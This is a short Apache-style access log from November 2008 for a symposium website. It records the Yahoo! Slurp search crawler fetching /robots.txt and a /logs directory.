67.195.37.190 - - [20/Nov/2008:08:59:14 -0500] "GET /logs/ HTTP/1.0" 200 373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.79.55 - - [20/Nov/2008:09:44:37 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.79.55 - - [20/Nov/2008:09:44:45 -0500] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.79.55 - - [20/Nov/2008:09:45:00 -0500] "GET /logs/ HTTP/1.0" 200 373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
72.30.161.235 - - [20/Nov/2008:09:57:15 -0500] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
